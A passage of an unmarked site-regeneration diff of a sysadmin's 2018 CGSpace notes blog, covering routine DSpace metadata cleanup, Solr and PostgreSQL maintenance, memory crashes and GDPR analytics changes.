<pre tabindex="0"><code>25-Apr-2018 13:26:21.493 SEVERE [http-nio-127.0.0.1-8443-exec-1] org.apache.coyote.AbstractProtocol$ConnectionHandler.process Error reading request, ignored
java.lang.NoSuchMethodError: java.nio.ByteBuffer.position(I)Ljava/nio/ByteBuffer;
at org.apache.coyote.http11.Http11InputBuffer.init(Http11InputBuffer.java:688)
at org.apache.coyote.http11.Http11Processor.service(Http11Processor.java:672)
@ -594,15 +594,15 @@ $ pg_restore -O -U dspacetest -d dspacetest -W -h localhost /tmp/dspace_2018-04-
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2021-08/">August, 2021</a></li>
<li><a href="/cgspace-notes/2025-01/">January, 2025</a></li>
<li><a href="/cgspace-notes/2021-07/">July, 2021</a></li>
<li><a href="/cgspace-notes/2024-12/">December, 2024</a></li>
<li><a href="/cgspace-notes/2021-06/">June, 2021</a></li>
<li><a href="/cgspace-notes/2024-11/">November, 2024</a></li>
<li><a href="/cgspace-notes/2021-05/">May, 2021</a></li>
<li><a href="/cgspace-notes/2024-10/">October, 2024</a></li>
<li><a href="/cgspace-notes/2021-04/">April, 2021</a></li>
<li><a href="/cgspace-notes/2024-09/">September, 2024</a></li>
</ol>
</section>

View File

@ -38,7 +38,7 @@ http://localhost:3000/solr/statistics/update?stream.body=%3Ccommit/%3E
Then I reduced the JVM heap size from 6144 back to 5120m
Also, I switched it to use OpenJDK instead of Oracle Java, as well as re-worked the Ansible infrastructure scripts to support hosts choosing which distribution they want to use
"/>
<meta name="generator" content="Hugo 0.87.0" />
<meta name="generator" content="Hugo 0.133.1">
@ -68,12 +68,12 @@ Also, I switched it to use OpenJDK instead of Oracle Java, as well as re-worked
<!-- combined, minified CSS -->
<link href="https://alanorth.github.io/cgspace-notes/css/style.beb8012edc08ba10be012f079d618dc243812267efe62e11f22fe49618f976a4.css" rel="stylesheet" integrity="sha256-vrgBLtwIuhC&#43;AS8HnWGNwkOBImfv5i4R8i/klhj5dqQ=" crossorigin="anonymous">
<link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
<!-- minified Font Awesome for SVG icons -->
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.ffbfea088a9a1666ec65c3a8cb4906e2a0e4f92dc70dbbf400a125ad2422123a.js" integrity="sha256-/7/qCIqaFmbsZcOoy0kG4qDk&#43;S3HDbv0AKElrSQiEjo=" crossorigin="anonymous"></script>
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
<!-- RSS 2.0 feed -->
@ -119,7 +119,7 @@ Also, I switched it to use OpenJDK instead of Oracle Java, as well as re-worked
<p class="blog-post-meta">
<time datetime="2018-05-01T16:43:54+03:00">Tue May 01, 2018</time>
in
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/cgspace-notes/categories/notes/" rel="category tag">Notes</a>
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
</p>
@ -175,7 +175,7 @@ Also, I switched it to use OpenJDK instead of Oracle Java, as well as re-worked
<li>There are lots of errors on language, CRP, and even some encoding errors on abstract fields</li>
<li>I export them and include the hidden metadata fields like <code>dc.date.accessioned</code> so I can filter the ones from 2018-04 and correct them in Open Refine:</li>
</ul>
<pre><code>$ dspace metadata-export -a -f /tmp/iita.csv -i 10568/68616
<pre tabindex="0"><code>$ dspace metadata-export -a -f /tmp/iita.csv -i 10568/68616
</code></pre><ul>
<li>Abenet sent a list of 46 ORCID identifiers for ILRI authors so I need to get their names using my <a href="https://gist.github.com/alanorth/57a88379126d844563c1410bd7b8d12b">resolve-orcids.py</a> script and merge them into our controlled vocabulary</li>
<li>On the messed up IITA records from 2018-04 I see sixty DOIs in incorrect format (cg.identifier.doi)</li>
@ -185,7 +185,7 @@ Also, I switched it to use OpenJDK instead of Oracle Java, as well as re-worked
<li>Fixing the IITA records from Sisay, sixty DOIs have completely invalid format like <code>http:dx.doi.org10.1016j.cropro.2008.07.003</code></li>
<li>I corrected all the DOIs and then checked them for validity with a quick bash loop:</li>
</ul>
<pre><code>$ for line in $(&lt; /tmp/links.txt); do echo $line; http --print h $line; done
<pre tabindex="0"><code>$ for line in $(&lt; /tmp/links.txt); do echo $line; http --print h $line; done
</code></pre><ul>
<li>Most of the links are good, though one is duplicate and one seems to even be incorrect in the publisher&rsquo;s site so&hellip;</li>
<li>Also, there are some duplicates:
@ -205,7 +205,7 @@ Also, I switched it to use OpenJDK instead of Oracle Java, as well as re-worked
<li>A few more interesting Unicode characters to look for in text fields like author, abstracts, and citations might be: <code></code> (0x2019), <code>·</code> (0x00b7), and <code></code> (0x20ac)</li>
<li>A custom text facit in OpenRefine with this GREL expression could be a good for finding invalid characters or encoding errors in authors, abstracts, etc:</li>
</ul>
<pre><code>or(
<pre tabindex="0"><code>or(
isNotNull(value.match(/.*[(|)].*/)),
isNotNull(value.match(/.*\uFFFD.*/)),
isNotNull(value.match(/.*\u00A0.*/)),
@ -218,7 +218,7 @@ Also, I switched it to use OpenJDK instead of Oracle Java, as well as re-worked
<li>I found some more IITA records that Sisay imported on 2018-03-23 that have invalid CRP names, so now I kinda want to check those ones!</li>
<li>Combine the ORCID identifiers Abenet sent with our existing list and resolve their names using the <a href="https://gist.github.com/alanorth/57a88379126d844563c1410bd7b8d12b">resolve-orcids.py</a> script:</li>
</ul>
<pre><code>$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml /tmp/ilri-orcids.txt | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq &gt; /tmp/2018-05-06-combined.txt
<pre tabindex="0"><code>$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml /tmp/ilri-orcids.txt | grep -oE &#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39; | sort | uniq &gt; /tmp/2018-05-06-combined.txt
$ ./resolve-orcids.py -i /tmp/2018-05-06-combined.txt -o /tmp/2018-05-06-combined-names.txt -d
# sort names, copy to cg-creator-id.xml, add XML formatting, and then format with tidy (preserving accents)
$ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-id.xml
@ -242,12 +242,12 @@ $ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-i
<li>I could use it with <a href="https://github.com/okfn/reconcile-csv">reconcile-csv</a> or to populate a Solr instance for reconciliation</li>
<li>This XPath expression gets close, but outputs all items on one line:</li>
</ul>
<pre><code>$ xmllint --xpath '//value-pairs[@value-pairs-name=&quot;crpsubject&quot;]/pair/stored-value/node()' dspace/config/input-forms.xml
<pre tabindex="0"><code>$ xmllint --xpath &#39;//value-pairs[@value-pairs-name=&#34;crpsubject&#34;]/pair/stored-value/node()&#39; dspace/config/input-forms.xml
Agriculture for Nutrition and HealthBig DataClimate Change, Agriculture and Food SecurityExcellence in BreedingFishForests, Trees and AgroforestryGenebanksGrain Legumes and Dryland CerealsLivestockMaizePolicies, Institutions and MarketsRiceRoots, Tubers and BananasWater, Land and EcosystemsWheatAquatic Agricultural SystemsDryland CerealsDryland SystemsGrain LegumesIntegrated Systems for the Humid TropicsLivestock and Fish
</code></pre><ul>
<li>Maybe <code>xmlstarlet</code> is better:</li>
</ul>
<pre><code>$ xmlstarlet sel -t -v '//value-pairs[@value-pairs-name=&quot;crpsubject&quot;]/pair/stored-value/text()' dspace/config/input-forms.xml
<pre tabindex="0"><code>$ xmlstarlet sel -t -v &#39;//value-pairs[@value-pairs-name=&#34;crpsubject&#34;]/pair/stored-value/text()&#39; dspace/config/input-forms.xml
Agriculture for Nutrition and Health
Big Data
Climate Change, Agriculture and Food Security
@ -275,7 +275,7 @@ Livestock and Fish
<li>I told them to get all <a href="https://cgspace.cgiar.org/oai/request?verb=ListRecords&amp;metadataPrefix=oai_dc&amp;set=com_10568_35697">CIAT records via OAI</a></li>
<li>Just a note to myself, I figured out how to get reconcile-csv to run from source rather than running the old pre-compiled JAR file:</li>
</ul>
<pre><code>$ lein run /tmp/crps.csv name id
<pre tabindex="0"><code>$ lein run /tmp/crps.csv name id
</code></pre><ul>
<li>I tried to reconcile against a CSV of our countries but reconcile-csv crashes</li>
</ul>
@ -310,15 +310,15 @@ Livestock and Fish
<li>Also, I learned how to do something cool with Jython expressions in OpenRefine</li>
<li>This will fetch a URL and return its HTTP response code:</li>
</ul>
<pre><code>import urllib2
<pre tabindex="0"><code>import urllib2
import re
pattern = re.compile('.*10.1016.*')
pattern = re.compile(&#39;.*10.1016.*&#39;)
if pattern.match(value):
get = urllib2.urlopen(value)
return get.getcode()
return &quot;blank&quot;
return &#34;blank&#34;
</code></pre><ul>
<li>I used a regex to limit it to just some of the DOIs in this case because there were thousands of URLs</li>
<li>Here the response code would be 200, 404, etc, or &ldquo;blank&rdquo; if there is no URL for that item</li>
@ -329,26 +329,26 @@ return &quot;blank&quot;
<li>I was checking the CIFOR data for duplicates using Atmire&rsquo;s Metadata Quality Module (and found some duplicates actually), but then DSpace died&hellip;</li>
<li>I didn&rsquo;t see anything in the Tomcat, DSpace, or Solr logs, but I saw this in <code>dmest -T</code>:</li>
</ul>
<pre><code>[Tue May 15 12:10:01 2018] Out of memory: Kill process 3763 (java) score 706 or sacrifice child
<pre tabindex="0"><code>[Tue May 15 12:10:01 2018] Out of memory: Kill process 3763 (java) score 706 or sacrifice child
[Tue May 15 12:10:01 2018] Killed process 3763 (java) total-vm:14667688kB, anon-rss:5705268kB, file-rss:0kB, shmem-rss:0kB
[Tue May 15 12:10:01 2018] oom_reaper: reaped process 3763 (java), now anon-rss:0kB, file-rss:0kB, shmem-rss:0kB
</code></pre><ul>
<li>So the Linux kernel killed Java&hellip;</li>
<li>Maria from Bioversity mailed to say she got an error while submitting an item on CGSpace:</li>
</ul>
<pre><code>Unable to load Submission Information, since WorkspaceID (ID:S96060) is not a valid in-process submission
<pre tabindex="0"><code>Unable to load Submission Information, since WorkspaceID (ID:S96060) is not a valid in-process submission
</code></pre><ul>
<li>Looking in the DSpace log I see something related:</li>
</ul>
<pre><code>2018-05-15 12:35:30,858 INFO org.dspace.submit.step.CompleteStep @ m.garruccio@cgiar.org:session_id=8AC4499945F38B45EF7A1226E3042DAE:submission_complete:Completed submission with id=96060
<pre tabindex="0"><code>2018-05-15 12:35:30,858 INFO org.dspace.submit.step.CompleteStep @ m.garruccio@cgiar.org:session_id=8AC4499945F38B45EF7A1226E3042DAE:submission_complete:Completed submission with id=96060
</code></pre><ul>
<li>So I&rsquo;m not sure&hellip;</li>
<li>I finally figured out how to get OpenRefine to reconcile values from Solr via <a href="https://github.com/codeforkjeff/conciliator">conciliator</a>:</li>
<li>The trick was to use a more appropriate Solr fieldType <code>text_en</code> instead of <code>text_general</code> so that more terms match, for example uppercase and lower case:</li>
</ul>
<pre><code>$ ./bin/solr start
<pre tabindex="0"><code>$ ./bin/solr start
$ ./bin/solr create_core -c countries
$ curl -X POST -H 'Content-type:application/json' --data-binary '{&quot;add-field&quot;: {&quot;name&quot;:&quot;country&quot;, &quot;type&quot;:&quot;text_en&quot;, &quot;multiValued&quot;:false, &quot;stored&quot;:true}}' http://localhost:8983/solr/countries/schema
$ curl -X POST -H &#39;Content-type:application/json&#39; --data-binary &#39;{&#34;add-field&#34;: {&#34;name&#34;:&#34;country&#34;, &#34;type&#34;:&#34;text_en&#34;, &#34;multiValued&#34;:false, &#34;stored&#34;:true}}&#39; http://localhost:8983/solr/countries/schema
$ ./bin/post -c countries ~/src/git/DSpace/2018-05-10-countries.csv
</code></pre><ul>
<li>It still doesn&rsquo;t catch simple mistakes like &ldquo;ALBANI&rdquo; or &ldquo;AL BANIA&rdquo; for &ldquo;ALBANIA&rdquo;, and it doesn&rsquo;t return scores, so I have to select matches manually:</li>
@ -357,9 +357,9 @@ $ ./bin/post -c countries ~/src/git/DSpace/2018-05-10-countries.csv
<ul>
<li>I should probably make a general copy field and set it to be the default search field, like DSpace&rsquo;s search core does (see schema.xml):</li>
</ul>
<pre><code>&lt;defaultSearchField&gt;search_text&lt;/defaultSearchField&gt;
<pre tabindex="0"><code>&lt;defaultSearchField&gt;search_text&lt;/defaultSearchField&gt;
...
&lt;copyField source=&quot;*&quot; dest=&quot;search_text&quot;/&gt;
&lt;copyField source=&#34;*&#34; dest=&#34;search_text&#34;/&gt;
</code></pre><ul>
<li>Actually, I wonder how much of their schema I could just copy&hellip;</li>
<li>Apparently the default search field is the <code>df</code> parameter and you could technically just add it to the query string, so no need to bother with that in the schema now</li>
@ -370,7 +370,7 @@ $ ./bin/post -c countries ~/src/git/DSpace/2018-05-10-countries.csv
<ul>
<li>Discuss GDPR with James Stapleton
<ul>
<li>As far as I see it, we are &ldquo;Data Controllers&rdquo; on CGSpace because we store peoples' names, emails, and phone numbers if they register</li>
<li>As far as I see it, we are &ldquo;Data Controllers&rdquo; on CGSpace because we store peoples&rsquo; names, emails, and phone numbers if they register</li>
<li>We set cookies on the user&rsquo;s computer, but these do not contain personally identifiable information (PII) and they are &ldquo;session&rdquo; cookies which are deleted when the user closes their browser</li>
<li>We use Google Analytics to track website usage, which makes Google the &ldquo;Data Processor&rdquo; and in this case we merely need to <em>limit</em> or <em>obfuscate</em> the information we send to them</li>
<li>As the only personally identifiable information we send is the user&rsquo;s IP address, I think we only need to enable <a href="https://support.google.com/analytics/answer/2763052">IP Address Anonymization</a> in our <code>analytics.js</code> code snippets</li>
@ -381,8 +381,8 @@ $ ./bin/post -c countries ~/src/git/DSpace/2018-05-10-countries.csv
<li>I created and merged a pull request to fix the sorting issue in Listings and Reports (<a href="https://github.com/ilri/DSpace/pull/374">#374</a>)</li>
<li>Regarding the IP Address Anonymization for GDPR, I ammended the Google Analytics snippet in <code>page-structure-alterations.xsl</code> to:</li>
</ul>
<pre><code>ga('send', 'pageview', {
'anonymizeIp': true
<pre tabindex="0"><code>ga(&#39;send&#39;, &#39;pageview&#39;, {
&#39;anonymizeIp&#39;: true
});
</code></pre><ul>
<li>I tested loading a certain page before and after adding this and afterwards I saw that the parameter <code>aip=1</code> was being sent with the analytics response to Google</li>
@ -439,7 +439,7 @@ $ ./bin/post -c countries ~/src/git/DSpace/2018-05-10-countries.csv
<ul>
<li>I&rsquo;m investigating how many non-CGIAR users we have registered on CGSpace:</li>
</ul>
<pre><code>dspace=# select email, netid from eperson where email not like '%cgiar.org%' and email like '%@%';
<pre tabindex="0"><code>dspace=# select email, netid from eperson where email not like &#39;%cgiar.org%&#39; and email like &#39;%@%&#39;;
</code></pre><ul>
<li>We might need to do something regarding these users for GDPR compliance because we have their names, emails, and potentially phone numbers</li>
<li>I decided that I will just use the cookieconsent script as is, since it looks good and technically does set the cookie with &ldquo;allow&rdquo; or &ldquo;dismiss&rdquo;</li>
@ -460,7 +460,7 @@ $ ./bin/post -c countries ~/src/git/DSpace/2018-05-10-countries.csv
<li>DSpace Test crashed last night, seems to be related to system memory (not JVM heap)</li>
<li>I see this in <code>dmesg</code>:</li>
</ul>
<pre><code>[Wed May 30 00:00:39 2018] Out of memory: Kill process 6082 (java) score 697 or sacrifice child
<pre tabindex="0"><code>[Wed May 30 00:00:39 2018] Out of memory: Kill process 6082 (java) score 697 or sacrifice child
[Wed May 30 00:00:39 2018] Killed process 6082 (java) total-vm:14876264kB, anon-rss:5683372kB, file-rss:0kB, shmem-rss:0kB
[Wed May 30 00:00:40 2018] oom_reaper: reaped process 6082 (java), now anon-rss:0kB, file-rss:0kB, shmem-rss:0kB
</code></pre><ul>
@ -471,8 +471,8 @@ $ ./bin/post -c countries ~/src/git/DSpace/2018-05-10-countries.csv
<li>I generated a list of CIFOR duplicates from the <code>CIFOR_May_9</code> collection using the Atmire MQM module and then dumped the HTML source so I could process it for sending to Vika</li>
<li>I used grep to filter all relevant handle lines from the HTML source then used sed to insert a newline before each &ldquo;Item1&rdquo; line (as the duplicates are grouped like Item1, Item2, Item3 for each set of duplicates):</li>
</ul>
<pre><code>$ grep -E 'aspect.duplicatechecker.DuplicateResults.field.del_handle_[0-9]{1,3}_Item' ~/Desktop/https\ _dspacetest.cgiar.org_atmire_metadata-quality_duplicate-checker.html &gt; ~/cifor-duplicates.txt
$ sed 's/.*Item1.*/\n&amp;/g' ~/cifor-duplicates.txt &gt; ~/cifor-duplicates-cleaned.txt
<pre tabindex="0"><code>$ grep -E &#39;aspect.duplicatechecker.DuplicateResults.field.del_handle_[0-9]{1,3}_Item&#39; ~/Desktop/https\ _dspacetest.cgiar.org_atmire_metadata-quality_duplicate-checker.html &gt; ~/cifor-duplicates.txt
$ sed &#39;s/.*Item1.*/\n&amp;/g&#39; ~/cifor-duplicates.txt &gt; ~/cifor-duplicates-cleaned.txt
</code></pre><ul>
<li>I told Vika to look through the list manually and indicate which ones are indeed duplicates that we should delete, and which ones to map to CIFOR&rsquo;s collection</li>
<li>A few weeks ago Peter wanted a list of authors from the ILRI collections, so I need to find a way to get the handles of all those collections</li>
@ -482,24 +482,24 @@ $ sed 's/.*Item1.*/\n&amp;/g' ~/cifor-duplicates.txt &gt; ~/cifor-duplicates-cle
<li>Oh shit, I literally already wrote a script to get all collections in a community hierarchy from the REST API: <a href="https://gist.github.com/alanorth/ddd7f555f0e487fe0e9d3eb4ff26ce50">rest-find-collections.py</a></li>
<li>The output isn&rsquo;t great, but all the handles and IDs are printed in debug mode:</li>
</ul>
<pre><code>$ ./rest-find-collections.py -u https://cgspace.cgiar.org/rest -d 10568/1 2&gt; /tmp/ilri-collections.txt
<pre tabindex="0"><code>$ ./rest-find-collections.py -u https://cgspace.cgiar.org/rest -d 10568/1 2&gt; /tmp/ilri-collections.txt
</code></pre><ul>
<li>Then I format the list of handles and put it into this SQL query to export authors from items ONLY in those collections (too many to list here):</li>
</ul>
<pre><code>dspace=# \copy (select distinct text_value, count(*) from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in ('10568/67236','10568/67274',...))) group by text_value order by count desc) to /tmp/ilri-authors.csv with csv;
<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;author&#39;) AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in (&#39;10568/67236&#39;,&#39;10568/67274&#39;,...))) group by text_value order by count desc) to /tmp/ilri-authors.csv with csv;
</code></pre><h2 id="2018-05-31">2018-05-31</h2>
<ul>
<li>Clarify CGSpace&rsquo;s usage of Google Analytics and personally identifiable information during user registration for Bioversity team who had been asking about GDPR compliance</li>
<li>Testing running PostgreSQL in a Docker container on localhost because when I&rsquo;m on Arch Linux there isn&rsquo;t an easily installable package for particular PostgreSQL versions</li>
<li>Now I can just use Docker:</li>
</ul>
<pre><code>$ docker pull postgres:9.5-alpine
<pre tabindex="0"><code>$ docker pull postgres:9.5-alpine
$ docker run --name dspacedb -e POSTGRES_PASSWORD=postgres -p 5432:5432 -d postgres:9.5-alpine
$ createuser -h localhost -U postgres --pwprompt dspacetest
$ createdb -h localhost -U postgres -O dspacetest --encoding=UNICODE dspacetest
$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest superuser;'
$ psql -h localhost -U postgres dspacetest -c &#39;alter user dspacetest superuser;&#39;
$ pg_restore -h localhost -O -U dspacetest -d dspacetest -W -h localhost ~/Downloads/cgspace_2018-05-30.backup
$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest nosuperuser;'
$ psql -h localhost -U postgres dspacetest -c &#39;alter user dspacetest nosuperuser;&#39;
$ psql -h localhost -U dspacetest -f ~/src/git/DSpace/dspace/etc/postgres/update-sequences.sql dspacetest
$ psql -h localhost -U postgres dspacetest
</code></pre>
@ -523,15 +523,15 @@ $ psql -h localhost -U postgres dspacetest
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2021-08/">August, 2021</a></li>
<li><a href="/cgspace-notes/2025-01/">January, 2025</a></li>
<li><a href="/cgspace-notes/2021-07/">July, 2021</a></li>
<li><a href="/cgspace-notes/2024-12/">December, 2024</a></li>
<li><a href="/cgspace-notes/2021-06/">June, 2021</a></li>
<li><a href="/cgspace-notes/2024-11/">November, 2024</a></li>
<li><a href="/cgspace-notes/2021-05/">May, 2021</a></li>
<li><a href="/cgspace-notes/2024-10/">October, 2024</a></li>
<li><a href="/cgspace-notes/2021-04/">April, 2021</a></li>
<li><a href="/cgspace-notes/2024-09/">September, 2024</a></li>
</ol>
</section>

View File

@ -58,7 +58,7 @@ real 74m42.646s
user 8m5.056s
sys 2m7.289s
"/>
<meta name="generator" content="Hugo 0.87.0" />
<meta name="generator" content="Hugo 0.133.1">
@ -88,12 +88,12 @@ sys 2m7.289s
<!-- combined, minified CSS -->
<link href="https://alanorth.github.io/cgspace-notes/css/style.beb8012edc08ba10be012f079d618dc243812267efe62e11f22fe49618f976a4.css" rel="stylesheet" integrity="sha256-vrgBLtwIuhC&#43;AS8HnWGNwkOBImfv5i4R8i/klhj5dqQ=" crossorigin="anonymous">
<link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
<!-- minified Font Awesome for SVG icons -->
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.ffbfea088a9a1666ec65c3a8cb4906e2a0e4f92dc70dbbf400a125ad2422123a.js" integrity="sha256-/7/qCIqaFmbsZcOoy0kG4qDk&#43;S3HDbv0AKElrSQiEjo=" crossorigin="anonymous"></script>
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
<!-- RSS 2.0 feed -->
@ -139,7 +139,7 @@ sys 2m7.289s
<p class="blog-post-meta">
<time datetime="2018-06-04T19:49:54-07:00">Mon Jun 04, 2018</time>
in
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/cgspace-notes/categories/notes/" rel="category tag">Notes</a>
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
</p>
@ -154,12 +154,12 @@ sys 2m7.289s
<li>I added the new CCAFS Phase II Project Tag <code>PII-FP1_PACCA2</code> and merged it into the <code>5_x-prod</code> branch (<a href="https://github.com/ilri/DSpace/pull/379">#379</a>)</li>
<li>I proofed and tested the ILRI author corrections that Peter sent back to me this week:</li>
</ul>
<pre><code>$ ./fix-metadata-values.py -i /tmp/2018-05-30-Correct-660-authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -t correct -m 3 -n
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2018-05-30-Correct-660-authors.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.contributor.author -t correct -m 3 -n
</code></pre><ul>
<li>I think a sane proofing workflow in OpenRefine is to apply the custom text facets for check/delete/remove and illegal characters that I developed in <a href="/cgspace-notes/2018-03/">March, 2018</a></li>
<li>Time to index ~70,000 items on CGSpace:</li>
</ul>
<pre><code>$ time schedtool -D -e ionice -c2 -n7 nice -n19 [dspace]/bin/dspace index-discovery -b
<pre tabindex="0"><code>$ time schedtool -D -e ionice -c2 -n7 nice -n19 [dspace]/bin/dspace index-discovery -b
real 74m42.646s
user 8m5.056s
@ -181,7 +181,7 @@ sys 2m7.289s
<li>Institut National des Recherches Agricoles du B nin</li>
<li>Centre de Coop ration Internationale en Recherche Agronomique pour le D veloppement</li>
<li>Institut des Recherches Agricoles du B nin</li>
<li>Institut des Savannes, C te d' Ivoire</li>
<li>Institut des Savannes, C te d&rsquo; Ivoire</li>
<li>Institut f r Pflanzenpathologie und Pflanzenschutz der Universit t, Germany</li>
<li>Projet de Gestion des Ressources Naturelles, B nin</li>
<li>Universit t Hannover</li>
@ -193,19 +193,19 @@ sys 2m7.289s
<li>I uploaded fixes for all those now, but I will continue with the rest of the data later</li>
<li>Regarding the SQL migration errors, Atmire told me I need to run some migrations manually in PostgreSQL:</li>
</ul>
<pre><code>delete from schema_version where version = '5.6.2015.12.03.2';
update schema_version set version = '5.6.2015.12.03.2' where version = '5.5.2015.12.03.2';
update schema_version set version = '5.8.2015.12.03.3' where version = '5.5.2015.12.03.3';
<pre tabindex="0"><code>delete from schema_version where version = &#39;5.6.2015.12.03.2&#39;;
update schema_version set version = &#39;5.6.2015.12.03.2&#39; where version = &#39;5.5.2015.12.03.2&#39;;
update schema_version set version = &#39;5.8.2015.12.03.3&#39; where version = &#39;5.5.2015.12.03.3&#39;;
</code></pre><ul>
<li>And then I need to ignore the ignored ones:</li>
</ul>
<pre><code>$ ~/dspace/bin/dspace database migrate ignored
<pre tabindex="0"><code>$ ~/dspace/bin/dspace database migrate ignored
</code></pre><ul>
<li>Now DSpace starts up properly!</li>
<li>Gabriela from CIP got back to me about the author names we were correcting on CGSpace</li>
<li>I did a quick sanity check on them and then did a test import with my <a href="https://gist.github.com/alanorth/df92cbfb54d762ba21b28f7cd83b6897"><code>fix-metadata-value.py</code></a> script:</li>
</ul>
<pre><code>$ ./fix-metadata-values.py -i /tmp/2018-06-08-CIP-Authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -t correct -m 3
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2018-06-08-CIP-Authors.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.contributor.author -t correct -m 3
</code></pre><ul>
<li>I will apply them on CGSpace tomorrow I think&hellip;</li>
</ul>
@ -220,8 +220,8 @@ update schema_version set version = '5.8.2015.12.03.3' where version = '5.5.2015
<li>I spent some time removing the Atmire Metadata Quality Module (MQM) from the proposed DSpace 5.8 changes</li>
<li>After removing all code mentioning MQM, mqm, metadata-quality, batchedit, duplicatechecker, etc, I think I got most of it removed, but there is a Spring error during Tomcat startup:</li>
</ul>
<pre><code> INFO [org.dspace.servicemanager.DSpaceServiceManager] Shutdown DSpace core service manager
Failed to startup the DSpace Service Manager: failure starting up spring service manager: Error creating bean with name 'org.dspace.servicemanager.spring.DSpaceBeanPostProcessor#0' defined in class path resource [spring/spring-dspace-applicationContext.xml]: Unsatisfied dependency expressed through constructor argument with index 0 of type [org.dspace.servicemanager.config.DSpaceConfigurationService]: : Cannot find class [com.atmire.dspace.discovery.ItemCollectionPlugin] for bean with name 'itemCollectionPlugin' defined in file [/home/aorth/dspace/config/spring/api/discovery.xml];
<pre tabindex="0"><code> INFO [org.dspace.servicemanager.DSpaceServiceManager] Shutdown DSpace core service manager
Failed to startup the DSpace Service Manager: failure starting up spring service manager: Error creating bean with name &#39;org.dspace.servicemanager.spring.DSpaceBeanPostProcessor#0&#39; defined in class path resource [spring/spring-dspace-applicationContext.xml]: Unsatisfied dependency expressed through constructor argument with index 0 of type [org.dspace.servicemanager.config.DSpaceConfigurationService]: : Cannot find class [com.atmire.dspace.discovery.ItemCollectionPlugin] for bean with name &#39;itemCollectionPlugin&#39; defined in file [/home/aorth/dspace/config/spring/api/discovery.xml];
</code></pre><ul>
<li>I can fix this by commenting out the <code>ItemCollectionPlugin</code> line of <code>discovery.xml</code>, but from looking at the git log I&rsquo;m not actually sure if that is related to MQM or not</li>
<li>I will have to ask Atmire</li>
@ -335,12 +335,12 @@ Failed to startup the DSpace Service Manager: failure starting up spring service
</ul>
</li>
</ul>
<pre><code>or(
value.contains('€'),
value.contains('6g'),
value.contains('6m'),
value.contains('6d'),
value.contains('6e')
<pre tabindex="0"><code>or(
value.contains(&#39;&#39;),
value.contains(&#39;6g&#39;),
value.contains(&#39;6m&#39;),
value.contains(&#39;6d&#39;),
value.contains(&#39;6e&#39;)
)
</code></pre><ul>
<li>So IITA should double check the abstracts for these:
@ -357,24 +357,24 @@ Failed to startup the DSpace Service Manager: failure starting up spring service
<li>Elizabeth from CIAT contacted me to ask if I could add ORCID identifiers to all of Robin Buruchara&rsquo;s items</li>
<li>I used my <a href="https://gist.githubusercontent.com/alanorth/a49d85cd9c5dea89cddbe809813a7050/raw/f67b6e45a9a940732882ae4bb26897a9b245ef31/add-orcid-identifiers-csv.py">add-orcid-identifiers-csv.py</a> script:</li>
</ul>
<pre><code>$ ./add-orcid-identifiers-csv.py -i 2018-06-13-Robin-Buruchara.csv -db dspace -u dspace -p 'fuuu'
<pre tabindex="0"><code>$ ./add-orcid-identifiers-csv.py -i 2018-06-13-Robin-Buruchara.csv -db dspace -u dspace -p &#39;fuuu&#39;
</code></pre><ul>
<li>The contents of <code>2018-06-13-Robin-Buruchara.csv</code> were:</li>
</ul>
<pre><code>dc.contributor.author,cg.creator.id
&quot;Buruchara, Robin&quot;,Robin Buruchara: 0000-0003-0934-1218
&quot;Buruchara, Robin A.&quot;,Robin Buruchara: 0000-0003-0934-1218
<pre tabindex="0"><code>dc.contributor.author,cg.creator.id
